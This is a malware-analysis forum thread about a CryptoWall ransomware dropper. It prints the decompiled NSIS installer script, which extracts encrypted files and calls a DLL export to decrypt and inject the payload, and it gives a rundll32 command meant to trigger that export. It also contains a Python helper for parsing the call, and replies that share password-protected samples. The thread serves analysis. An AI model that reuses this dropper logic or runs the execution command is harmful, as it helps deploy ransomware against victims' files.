A forum for reverse engineering, OS internals and malware analysis 

 #27313  by Grinler
 Wed Nov 25, 2015 11:09 pm
CryptoWall being distributed using an NSIS installer. As explained by Brad Duncan in his ISC handler's diary, CryptoWall is now being distributed via exploit kits. The payload is an NSIS installer.

The installer contained the files MuskegCommuneKinesthesia, suppress.navigation.xml, and skiplanes.dll. The sample from Brad's diary is attached to this post.

The extracted NSIS installer config is:
Code:
; NSIS script NSIS-3
; Install

SetCompressor /SOLID lzma
SetCompressorDictSize 8

; --------------------
; HEADER SIZE: 8765
; START HEADER SIZE: 300
; MAX STRING LENGTH: 1024
; STRING CHARS: 3171

OutFile [NSIS].exe
!include WinMessages.nsh

InstallDirRegKey HKCU Software\$$R1 $$7
LicenseBkColor /windows


; --------------------
; LANG TABLES: 1
; LANG STRINGS: 78

Name bookworms
BrandingText "Nullsoft Install System v3.0b1"

; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System v3.0b1"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 bookworms
LangString LSTR_3 1033 "Space available: "
LangString LSTR_4 1033 "Space required: "
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_13 1033 "Delete file: "
LangString LSTR_14 1033 "Delete on reboot: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_26 1033 "Remove folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_32 1033 B
LangString LSTR_33 1033 K
LangString LSTR_34 1033 M
LangString LSTR_35 1033 G
LangString LSTR_36 1033 "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)."
LangString LSTR_37 1033 "License Agreement"
LangString LSTR_38 1033 "Please review the license terms before installing $(LSTR_77)."
LangString LSTR_39 1033 "Press Page Down to see the rest of the agreement."
LangString LSTR_40 1033 "Choose Components"
LangString LSTR_41 1033 "Choose which features of $(LSTR_77) you want to install."
LangString LSTR_42 1033 Description
LangString LSTR_43 1033 "Position your mouse over a component to see its description."
LangString LSTR_44 1033 "Choose Install Location"
LangString LSTR_45 1033 "Choose the folder in which to install $(LSTR_77)."
LangString LSTR_46 1033 Installing
LangString LSTR_47 1033 "Please wait while $(LSTR_77) is being installed."
LangString LSTR_48 1033 "Installation Complete"
LangString LSTR_49 1033 "Setup was completed successfully."
LangString LSTR_50 1033 "Installation Aborted"
LangString LSTR_51 1033 "Setup was not completed successfully."
LangString LSTR_52 1033 "MS Shell Dlg"
LangString LSTR_53 1033 8
LangString LSTR_54 1033 "Are you sure you want to quit $(LSTR_2) Setup?"
LangString LSTR_55 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_56 1033 $R1
LangString LSTR_57 1033 Custom
LangString LSTR_58 1033 Cancel
LangString LSTR_59 1033 "< &Back"
LangString LSTR_60 1033 "I &Agree"
LangString LSTR_61 1033 "Click Next to continue."
LangString LSTR_62 1033 "Check the components you want to install and uncheck the components you don't want to install. $_CLICK"
LangString LSTR_63 1033 "Select the type of install:"
LangString LSTR_64 1033 "Or, select the optional components you wish to install:"
LangString LSTR_65 1033 "Select components to install:"
LangString LSTR_66 1033 "&Next >"
LangString LSTR_67 1033 "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK"
LangString LSTR_68 1033 "Destination Folder"
LangString LSTR_69 1033 B&rowse...
LangString LSTR_70 1033 "Select the folder to install $(LSTR_77) in:"
LangString LSTR_71 1033 &Install
LangString LSTR_72 1033 "Click Install to start the installation."
LangString LSTR_73 1033 "Show &details"
LangString LSTR_74 1033 Completed
LangString LSTR_75 1033 " "
LangString LSTR_76 1033 &Close
LangString LSTR_77 1033 bookworms


; --------------------
; VARIABLES: 34

Var _0_
Var _1_
Var _2_
Var _3_
Var _4_
Var _5_
Var _6_
Var _7_
Var _8_
Var _9_
Var _10_
Var _11_
Var _12_
Var _13_
Var _14_
Var _15_
Var _16_
Var _17_
Var _18_
Var _19_
Var _20_
Var _21_
Var _22_
Var _23_
Var _24_
Var _25_
Var _26_
Var _27_
Var _28_
Var _29_
Var _30_
Var _31_
Var _32_
Var _33_


InstType $(LSTR_57)    ;  Custom
InstallDir $TEMP
; wininit = $WINDIR\wininit.ini


; --------------------
; PAGES: 5

; Page 0
Page license func_0 func_3 func_9 /ENABLECANCEL
  LicenseText $(LSTR_36) $(LSTR_60)    ;  "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)." "I &Agree" bookworms
  LicenseData [LICENSE].txt

; Page 1
Page components func_10 func_13 func_27 /ENABLECANCEL
  ComponentsText $(LSTR_62) $(LSTR_63) $(LSTR_64)    ;  "Check the components you want to install and uncheck the components you don't want to install. $_CLICK" "Select the type of install:" "Or, select the optional components you wish to install:"

; Page 2
Page directory func_28 func_31 func_39 /ENABLECANCEL
  DirText $(LSTR_67) $(LSTR_68) $(LSTR_69) $(LSTR_70)    ;  "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK" "Destination Folder" B&rowse... "Select the folder to install $(LSTR_77) in:" bookworms bookworms
  DirVar $CMDLINE

; Page 3
Page instfiles func_40 func_43 func_49
  CompletedText $(LSTR_74)    ;  Completed
  DetailsButtonText $(LSTR_73)    ;  "Show &details"

/*
; Page 4
Page COMPLETED
*/


; --------------------
; SECTIONS: 1
; COMMANDS: 127

Function func_0    ; Page 0, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_37)    ;  "License Agreement"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_38)    ;  "Please review the license terms before installing $(LSTR_77)." bookworms
FunctionEnd


Function func_3    ; Page 0, Show
  FindWindow $_12_ "#32770" "" $HWNDPARENT
  GetDlgItem $_13_ $_12_ 1040
  GetDlgItem $_14_ $_12_ 1006
  GetDlgItem $_15_ $_12_ 1000
  SendMessage $_13_ ${WM_SETTEXT} 0 STR:$(LSTR_39)    ;  "Press Page Down to see the rest of the agreement."
FunctionEnd


Function func_9    ; Page 0, Leave
FunctionEnd


Function func_10    ; Page 1, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_40)    ;  "Choose Components"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_41)    ;  "Choose which features of $(LSTR_77) you want to install." bookworms
FunctionEnd


Function func_13    ; Page 1, Show
  FindWindow $_16_ "#32770" "" $HWNDPARENT
  GetDlgItem $_17_ $_16_ 1006
  GetDlgItem $_18_ $_16_ 1021
  GetDlgItem $_19_ $_16_ 1022
  GetDlgItem $_20_ $_16_ 1017
  GetDlgItem $_21_ $_16_ 1032
  GetDlgItem $_22_ $_16_ 1042
  GetDlgItem $_24_ $_16_ 1043
  GetDlgItem $_25_ $_16_ 1023
  SendMessage $_22_ ${WM_SETTEXT} 0 STR:$(LSTR_42)    ;  Description
  EnableWindow $_24_ 0
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_43)    ;  "Position your mouse over a component to see its description."
  StrCpy $_23_ $(LSTR_43)    ;  "Position your mouse over a component to see its description."
FunctionEnd


Function func_27    ; Page 1, Leave
FunctionEnd


Function func_28    ; Page 2, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_44)    ;  "Choose Install Location"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_45)    ;  "Choose the folder in which to install $(LSTR_77)." bookworms
FunctionEnd


Function func_31    ; Page 2, Show
  FindWindow $_26_ "#32770" "" $HWNDPARENT
  GetDlgItem $_27_ $_26_ 1006
  GetDlgItem $_28_ $_26_ 1020
  GetDlgItem $_29_ $_26_ 1019
  GetDlgItem $_30_ $_26_ 1001
  GetDlgItem $_31_ $_26_ 1023
  GetDlgItem $_32_ $_26_ 1024
FunctionEnd


Function func_39    ; Page 2, Leave
FunctionEnd


Function func_40    ; Page 3, Pre
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_46)    ;  Installing
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_47)    ;  "Please wait while $(LSTR_77) is being installed." bookworms
FunctionEnd


Function func_43    ; Page 3, Show
  FindWindow $_33_ "#32770" "" $HWNDPARENT
  GetDlgItem $_34_ $_33_ 1006
  GetDlgItem $_35_ $_33_ 1004
  GetDlgItem $_36_ $_33_ 1027
  GetDlgItem $_37_ $_33_ 1016
FunctionEnd


Function func_49    ; Page 3, Leave
  IfAbort label_53
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_48)    ;  "Installation Complete"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_49)    ;  "Setup was completed successfully."
  Goto label_55
label_53:
  SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_50)    ;  "Installation Aborted"
  SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_51)    ;  "Setup was not completed successfully."
label_55:
  IfAbort label_56
label_56:
FunctionEnd


Function .onGUIInit
  GetDlgItem $_0_ $HWNDPARENT 1037
  CreateFont $_1_ $(LSTR_52) $(LSTR_53) 700    ;  "MS Shell Dlg" 8
  SendMessage $_0_ ${WM_SETFONT} $_1_ 0
  GetDlgItem $_2_ $HWNDPARENT 1038
  SetCtlColors $_0_ "" 0xFFFFFF
  SetCtlColors $_2_ "" 0xFFFFFF
  GetDlgItem $_3_ $HWNDPARENT 1034
  SetCtlColors $_3_ "" 0xFFFFFF
  GetDlgItem $_4_ $HWNDPARENT 1039
  SetCtlColors $_4_ "" 0xFFFFFF
  GetDlgItem $_6_ $HWNDPARENT 1028
  SetCtlColors $_6_ /BRANDING ""
  GetDlgItem $_5_ $HWNDPARENT 1256
  SetCtlColors $_5_ /BRANDING ""
  SendMessage $_5_ ${WM_SETTEXT} 0 "STR:$(LSTR_0) "    ;  "Nullsoft Install System v3.0b1"
  GetDlgItem $_7_ $HWNDPARENT 1035
  GetDlgItem $_8_ $HWNDPARENT 1045
  GetDlgItem $_9_ $HWNDPARENT 1
  GetDlgItem $_10_ $HWNDPARENT 2
  GetDlgItem $_11_ $HWNDPARENT 3
FunctionEnd


Function .onUserAbort
  MessageBox MB_YESNO|MB_ICONEXCLAMATION $(LSTR_54) IDYES label_80    ;  "Are you sure you want to quit $(LSTR_2) Setup?" bookworms
  Abort
label_80:
FunctionEnd


Function .onInit
  StrCpy $R1 2
label_82:
  DetailPrint $7
  IntCmp $7 13105745 0 0 label_87
  DetailPrint $7
  IntOp $7 $7 + $R1
  Goto label_82
label_87:
  SetOutPath $INSTDIR
  File MuskegCommuneKinesthesia
  File suppress.navigation.xml
  File skiplanes.dll
  StrCpy $R7 MisbehaviourGittern
  StrCpy $6 MuskegCommuneKinesthesia
  System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
    ; Call Initialize_____Plugins
    ; SetOverwrite off
    ; File $PLUGINSDIR\System.dll
    ; SetDetailsPrint lastused
    ; Push "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
    ; CallInstDLL $PLUGINSDIR\System.dll Call
  Quit
FunctionEnd


Section bookworms ; Section_0
  SetOutPath $INSTDIR
  WriteRegStr HKCU Software\$R1 $7 $INSTDIR
SectionEnd


Function .onMouseOverSection
  StrCmp $0 -1 0 label_108
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:
  EnableWindow $_24_ 0
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:$_23_
  Goto label_112
label_108:
  StrCmp $0 0 0 label_112
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:
  EnableWindow $_24_ 1
  SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_56)    ;  $R1
label_112:
FunctionEnd


/*
Function Initialize_____Plugins
  SetDetailsPrint none
  StrCmp $PLUGINSDIR "" 0 label_123
  Push $0
  SetErrors
  GetTempFileName $0
  Delete $0
  CreateDirectory $0
  IfErrors label_124
  StrCpy $PLUGINSDIR $0
  Pop $0
label_123:
  Return

label_124:
  MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
  Quit
FunctionEnd
*/



; --------------------
; UNREFERENCED STRINGS:

/*
1 ProgramFilesDir
17 CommonFilesDir
32 "C:\Program Files"
49 $PROGRAMFILES
53 "$PROGRAMFILES\Common Files"
70 $COMMONFILES
*/
MuskegCommuneKinesthesia and suppress.navigation.xml appear to contain encrypted content. I am far from experienced with NSIS, but from the script it appears that CW is being installed via this command:
Code:
 System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
When trying to convert it to a rundll32 line, I think it is something like:
Code:
rundll32.exe skiplanes.dll,Leakage 475 MuskegCommuneKinesthesia .r0 "<path_to>\suppress.navigation.xml" MisbehaviourGittern
Something is missing though, as executing the above command does not perform the injection/install. Not sure what .r0 represents, other than that it is supposed to be an integer.

My guess is the Leakage function decrypts the contents of suppress.navigation.xml, which becomes the payload to inject?

I will leave that up to you reversers to figure that part out :)
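As an added analyst's aid (not code from the post, from NSIS or from the sample), the Python below decodes the System::Call line quoted above into its DLL, export and parameter list. It follows the System plugin's documented parameter syntax ("type source destination", where a leading "." means no input value), so "i .r0" comes out as an output-only integer written back to $0 rather than an argument; the variable values are taken from the StrCpy and InstallDir lines of the script.

```python
import re

# Added analysis helper (not from the post or NSIS): decode a System plugin call.
# Parameter syntax is "type source destination"; a leading "." means no input
# value, so "i .r0" is an output-only int written to $0 after the call.
TYPE_NAMES = {"i": "int", "m": "multibyte string", "t": "text string", "p": "pointer"}

# Constructed from the script above ($INSTDIR is $TEMP because of "InstallDir $TEMP").
SCRIPT_LINE = r'System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"'
SCRIPT_ENV = {"$6": "MuskegCommuneKinesthesia", "$R7": "MisbehaviourGittern", "$INSTDIR": "$TEMP"}

def nsis_unescape(s):
    """Undo the NSIS $\" escape for a literal double quote inside a quoted string."""
    return s.replace('$\\"', '"')

def split_params(body):
    """Split the parameter list on commas that are outside double quotes."""
    parts, cur, quoted = [], "", False
    for ch in body:
        quoted ^= ch == '"'
        if ch == "," and not quoted:
            parts, cur = parts + [cur.strip()], ""
        else:
            cur += ch
    return parts + ([cur.strip()] if cur.strip() else [])

def expand_vars(text, env):
    """Substitute $0-$9, $R0-$R9 and $NAME variables from the analyst-supplied env."""
    return re.sub(r"\$(R?\d|[A-Z_]+)", lambda m: env.get(m.group(0), m.group(0)), text)

def parse_param(token, env):
    """Return {type, input, output} for one "type spec" parameter token."""
    typ, _, spec = token.partition(" ")
    spec = spec.strip()
    p = {"type": TYPE_NAMES.get(typ, typ), "input": None, "output": None}
    if spec.startswith("."):                      # ".r0" -> $0, ".R7" -> $R7
        p["output"] = "$" + (spec[2:] if spec[1] == "r" else spec[1:])
    elif spec.startswith('"'):                    # quoted string literal
        p["input"] = expand_vars(spec.strip('"'), env)
    else:                                         # bare number or variable
        p["input"] = int(spec) if spec.lstrip("-").isdigit() else expand_vars(spec, env)
    return p

def parse_system_call(line, env):
    """Parse a decompiled 'System::Call "dll::Func(params)"' line."""
    inner = nsis_unescape(re.search(r'System::Call\s+"(.*)"\s*$', line).group(1))
    head, _, rest = inner.partition("(")
    dll, _, func = head.partition("::")
    params = [parse_param(t, env) for t in split_params(rest.rsplit(")", 1)[0])]
    return {"dll": dll, "export": func, "params": params,
            "inputs": [p["input"] for p in params if p["input"] is not None],
            "outputs": [p["output"] for p in params if p["output"]]}
```

For the line from this script the result is four inputs (475, the two file names and the string MisbehaviourGittern) and one output register, $0, which is the value the rundll32 attempt above was passing as if it were a fifth argument.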
 #28455  by EP_X0FF
 Thu May 05, 2016 5:44 am
oshi wrote:
henices wrote: CryptoWall 4.0
what is the password for attachment?
infected
 #29181  by flrud2208
 Tue Sep 06, 2016 1:31 am
Sample of CryptoWall for analysis

pass - infected
Attachments
contains exe that was used to drop malware
 #29184  by xors
 Tue Sep 06, 2016 12:39 pm
Don't we have a thread for it?
Attachments
password:infected